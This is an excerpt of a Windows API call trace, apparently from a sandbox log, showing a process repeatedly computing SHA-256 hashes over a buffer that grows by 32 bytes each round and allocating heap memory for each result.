	[0217.110] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.110] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0217.110] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.110] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736f30
	[0217.110] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736f30, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736f30, pdwDataLen=0x1284a8) returned 1
	[0217.110] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.110] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.110] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.111] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.111] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0217.111] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736f58
	[0217.111] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736f58, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736f58, pdwDataLen=0x1284a8) returned 1
	[0217.111] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.111] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.111] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.111] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.111] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0217.111] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.111] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736f80
	[0217.111] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736f80, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736f80, pdwDataLen=0x1284a8) returned 1
	[0217.111] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.111] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.111] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.112] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.112] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0217.112] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736fa8
	[0217.112] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736fa8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736fa8, pdwDataLen=0x1284a8) returned 1
	[0217.112] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.112] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.112] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.112] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.112] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0217.112] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.112] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736fd0
	[0217.112] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2736fd0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736fd0, pdwDataLen=0x1284a8) returned 1
	[0217.113] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.113] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.113] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.113] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.113] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0217.113] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736ff8
	[0217.113] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2736ff8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2736ff8, pdwDataLen=0x1284a8) returned 1
	[0217.113] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.113] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.113] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.113] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.113] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0217.114] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737020
	[0217.114] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737020, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737020, pdwDataLen=0x1284a8) returned 1
	[0217.114] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.114] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.114] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.114] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.114] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0217.114] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737048
	[0217.114] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737048, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737048, pdwDataLen=0x1284a8) returned 1
	[0217.114] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.114] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.114] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.115] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.115] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0217.115] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737070
	[0217.115] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737070, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737070, pdwDataLen=0x1284a8) returned 1
	[0217.115] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.115] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.115] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.115] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.115] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0217.115] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737098
	[0217.115] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737098, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737098, pdwDataLen=0x1284a8) returned 1
	[0217.115] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.115] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.115] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.116] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.116] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0217.116] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27370c0
	[0217.116] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27370c0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27370c0, pdwDataLen=0x1284a8) returned 1
	[0217.116] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.116] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.116] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.116] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.116] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0217.116] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27370e8
	[0217.116] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27370e8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27370e8, pdwDataLen=0x1284a8) returned 1
	[0217.116] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.116] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.116] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.117] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.117] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0217.117] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737110
	[0217.117] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737110, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737110, pdwDataLen=0x1284a8) returned 1
	[0217.117] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.117] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.117] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.117] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.117] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0217.117] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.117] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737138
	[0217.117] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737138, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737138, pdwDataLen=0x1284a8) returned 1
	[0217.117] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.117] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.117] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.118] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.118] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0217.118] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737160
	[0217.118] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737160, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737160, pdwDataLen=0x1284a8) returned 1
	[0217.118] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.118] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.118] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.118] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.118] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0217.118] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737188
	[0217.118] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737188, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737188, pdwDataLen=0x1284a8) returned 1
	[0217.118] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.118] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.118] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.119] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.119] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0217.119] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27371b0
	[0217.119] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27371b0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27371b0, pdwDataLen=0x1284a8) returned 1
	[0217.119] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.119] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.119] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.119] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.119] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0217.119] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27371d8
	[0217.119] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27371d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27371d8, pdwDataLen=0x1284a8) returned 1
	[0217.120] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.120] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.120] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.120] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.120] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0217.120] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737200
	[0217.120] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737200, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737200, pdwDataLen=0x1284a8) returned 1
	[0217.120] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.120] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.120] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.120] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.120] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0217.121] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737228
	[0217.121] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737228, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737228, pdwDataLen=0x1284a8) returned 1
	[0217.121] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.121] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.121] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.121] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.121] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0217.121] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737250
	[0217.121] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737250, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737250, pdwDataLen=0x1284a8) returned 1
	[0217.121] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.121] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.121] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.122] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.122] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0217.122] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737278
	[0217.122] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x2737278, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737278, pdwDataLen=0x1284a8) returned 1
	[0217.122] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.122] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.122] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.122] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.122] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0217.122] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27372a0
	[0217.122] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27372a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27372a0, pdwDataLen=0x1284a8) returned 1
	[0217.122] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.122] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.122] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.123] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.123] CryptHashData (hHash=0x22b6b00, pbData=0x2762c50, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0217.123] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27372c8
	[0217.123] CryptGetHashParam (in: hHash=0x22b6b00, dwParam=0x2, pbData=0x27372c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27372c8, pdwDataLen=0x1284a8) returned 1
	[0217.123] CryptDestroyHash (hHash=0x22b6b00) returned 1
	[0217.123] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
	[0217.123] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x2259f0) returned 1
	[0217.123] CryptCreateHash (in: hProv=0x2259f0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0217.123] CryptHashData (hHash=0x22b6ac0, pbData=0x2762c50, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0217.123] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0217.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27372f0
	[0217.123] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27372f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27372f0, pdwDataLen=0x1284a8) returned 1
	[0217.123] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0217.123] CryptReleaseContext (hProv=0x2259f0, dwFlags=0x0) returned 1
